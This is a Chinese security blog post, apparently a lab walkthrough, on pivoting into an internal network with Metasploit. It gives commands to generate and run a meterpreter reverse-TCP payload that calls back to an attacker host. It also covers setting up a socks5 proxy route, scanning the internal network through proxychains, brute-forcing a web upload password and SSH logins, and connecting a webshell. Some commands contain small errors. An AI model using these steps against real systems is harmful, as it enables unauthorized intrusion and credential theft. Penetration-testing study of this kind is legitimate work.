前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >安全攻防 | Metasploit 代理

安全攻防 | Metasploit 代理

作者头像
安全小王子
发布2021-03-16 16:32:23
发布2021-03-16 16:32:23
1.5K00
代码可运行
举报
文章被收录于专栏:betasecbetasec
运行总次数:0
代码可运行

声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企业安全、国家安全。

0x01前言

本‍‍‍‍次所使用的攻击机为kali linux系统,攻击过程中涉及到的工具主要有:中国菜刀/中国蚂剑,burpsuite,metasploit,MobaXterm,一句话木马,proxychains,nmap脚本等。攻击的拓扑结构如下图所示。

0x02反弹Payload

攻击机进行监听设置(注意:监听主机设置需要与生成的payload保持一致):

代码语言:javascript
代码运行次数:0
复制
>>> use exploit/multi/handler>>> set payloads linux/x64/meterpreter_reverse_tcp>>> set LHOST 192.168.124.15        #监听主机ip地址>>> set PORT 9999                  #监听主机端口号>>> exploit -j

生成反弹需要的payload文件:

代码语言:javascript
代码运行次数:0
复制
>>> msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=IP LPORT =PORT -f elf > shell.elf

将生成的文件上传到目标主机,并更改payload可执行权限,并执行。

代码语言:javascript
代码运行次数:0
复制
>>> chmod 777 shell.elf>>> ./shell.elf

在攻击端,监听的主机收到目标主机反弹的shell权限,如下图所示:

0x03添加socks5代理

此时为了能够访问到内网,需要进行添加代理操作。查看当前路由有一个内网段ip地址段位172.17.0.0/24。

执行指令添加路由操作。

代码语言:javascript
代码运行次数:0
复制
>>> run autoroute -s 172.17.0.0/24

添加socks5代理:

代码语言:javascript
代码运行次数:0
复制
>>> use auxiliary/server/socks5>>> run

此处应用proxychains工具,进行内网探测,使用编辑器在文件/etc/proxychains.conf的最后一行加入socks5代理的配置信息。

--- snippet ---[ProxyList]# add proxy here ...# meanwile# defaults set to "tor"socks5 127.0.0.1 1080

0x04内网主机端口探测

通过执行代理工具proxychains,内网web服务进行探测,可以发现主机ip地址为172.17.0.4。执行指令如下所示:

代码语言:javascript
代码运行次数:0
复制
>>> Proxychains nmap 172.17.0.0/24 -sV  -sT  -Pn  -T 4 -p80

0x05内网web暴力破解

此时通过浏览器是不能访问到内网服务器,需要在浏览器配置代理进行访问,配置代理类型选择socks5,本地端口为1080。配置好以后,就能通过代理访问内网主机的web应用了。

通过浏览页面可发现,为一个文件上传页面,但是上传需要输入口令,方可操作成功。此时考虑可通过burpsuite进行拦截后,口令破解。

打开burpsuite后,需要添加代理,这样才能将拦截到的数据正确发送到目标服务器,配置过程如下所示:

对拦截的数据更改口令字段,添加常用字典,此处用的字典为:top1000.txt。查看破解成功字段的真实口令为password。

0x06内网上传webshell

常用的菜刀,Cknife等工具并不存在代理功能,此处使用中国蚁剑工具进行连接,配置蚁剑代理如下所示:

成功连接到内网的shell后,访问目标系统不同目录

0x07远程连接内网主机SSH服务

对内网的22端口进行探测,发现主机172.17.0.8开放22端口,并对该内网主机进行ssh弱口令猜解。

代码语言:javascript
代码运行次数:0
复制
>>> proxychains nmap -sV -t -Pn -p22 127.17.0.0/24

通过第三方工具MobaXterm添加代理后,远程连接到内网主机,具体操作过程如下所示:

【推荐书籍】

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-03-12,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 betasec 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档